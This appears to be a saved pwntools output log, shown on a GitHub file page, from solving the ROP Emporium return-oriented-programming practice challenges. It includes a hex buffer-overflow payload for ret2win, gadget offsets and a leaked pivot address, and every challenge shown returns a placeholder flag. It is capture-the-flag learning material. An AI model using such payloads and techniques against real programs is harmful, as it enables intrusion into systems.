-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploitOutput.txt
136 lines (118 loc) · 4.39 KB
/
exploitOutput.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
[x] Starting local process './ret2win'
[+] Starting local process './ret2win': pid 5024
Payload in hex: 4141414141414141414141414141414141414141414141414141414141414141414141414141414170074000000000005607400000000000
Payload in ASCII: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp\x07@\x00\x00\x00\x00\x00V\x07@\x00\x00\x00\x00\x00'
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 296B
[x] Receiving all data: 329B
[+] Receiving all data: Done (329B)
[*] Process './ret2win' stopped with exit code 0 (pid 5024)
ret2win by ROP Emporium
x86_64
For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!
> Thank you!
Well done! Here's your flag:
ROPE{a_placeholder_32byte_flag!}
[x] Starting local process './split'
[+] Starting local process './split': pid 5027
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 87B
[x] Receiving all data: 120B
[+] Receiving all data: Done (120B)
[*] Stopped process './split' (pid 5027)
split by ROP Emporium
x86_64
Contriving a reason to ask user for data...
> Thank you!
ROPE{a_placeholder_32byte_flag!}
[x] Starting local process '/usr/bin/gdbserver'
[+] Starting local process '/usr/bin/gdbserver': pid 5030
[*] running in new terminal: ['/usr/bin/gdb', '-q', './callme', '-x', '/tmp/pwnlib-gdbscript-m1vphqyz.gdb']
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 79B
[x] Receiving all data: 171B
[+] Receiving all data: Done (171B)
[*] Process '/usr/bin/gdbserver' stopped with exit code 0 (pid 5033)
b'callme by ROP Emporium\nx86_64\n\nHope you read the instructions...\n\n> Thank you!\ncallme_one() called correctly\ncallme_two() called correctly\nAi\xca\n\nChild exited with status 0\n'
[x] Starting local process './write4'
[+] Starting local process './write4': pid 5073
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 118B
[+] Receiving all data: Done (118B)
[*] Stopped process './write4' (pid 5073)
write4 by ROP Emporium
x86_64
Go ahead and give me the input already!
> Thank you!
ROPE{a_placeholder_32byte_flag!}
[x] Starting local process './badchars'
[+] Starting local process './badchars': pid 5074
dnce,vzv
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 112B
[+] Receiving all data: Done (112B)
[*] Stopped process './badchars' (pid 5074)
badchars by ROP Emporium
x86_64
badchars are: 'x', 'g', 'a', '.'
> Thank you!
ROPE{a_placeholder_32byte_flag!}
[x] Starting local process './fluff'
[+] Starting local process './fluff': pid 5075
f -> Offset:0x3c4 || Actual -> 0x4003c4
l -> Offset:0x239 || Actual -> 0x400239
a -> Offset:0x3d6 || Actual -> 0x4003d6
g -> Offset:0x3cf || Actual -> 0x4003cf
. -> Offset:0x24e || Actual -> 0x40024e
t -> Offset:0x192 || Actual -> 0x400192
x -> Offset:0x246 || Actual -> 0x400246
t -> Offset:0x192 || Actual -> 0x400192
['0x4003c4', '0x400239', '0x4003d6', '0x4003cf', '0x40024e', '0x400192', '0x400246', '0x400192']
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 148B
[+] Receiving all data: Done (148B)
[*] Stopped process './fluff' (pid 5075)
fluff by ROP Emporium
x86_64
You know changing these strings means I have to rewrite my solutions...
> Thank you!
ROPE{a_placeholder_32byte_flag!}
[x] Starting local process './pivot'
[+] Starting local process './pivot': pid 5076
pivot by ROP Emporium
x86_64
Call ret2win() from libpivot
The Old Gods kindly bestow upon you a place to pivot: 0x7f6c90dfff10
Send a ROP chain now and it will land there
>
Heap address found: 0x7f6c90dfff10
[x] Receiving all data
[x] Receiving all data: 47B
[*] Process './pivot' stopped with exit code 0 (pid 5076)
[x] Receiving all data: 173B
[+] Receiving all data: Done (173B)
Thank you!
Now please send your stack smash
> Thank you!
foothold_function(): Check out my .got.plt entry to gain a foothold into libpivot
ROPE{a_placeholder_32byte_flag!}
[x] Starting local process './ret2csu'
[+] Starting local process './ret2csu': pid 5077
[x] Receiving all data
[x] Receiving all data: 0B
[*] Process './ret2csu' stopped with exit code 0 (pid 5077)
[x] Receiving all data: 184B
[+] Receiving all data: Done (184B)
ret2csu by ROP Emporium
x86_64
Check out https://ropemporium.com/challenge/ret2csu.html for information on how to solve this challenge.
> Thank you!
ROPE{a_placeholder_32byte_flag!}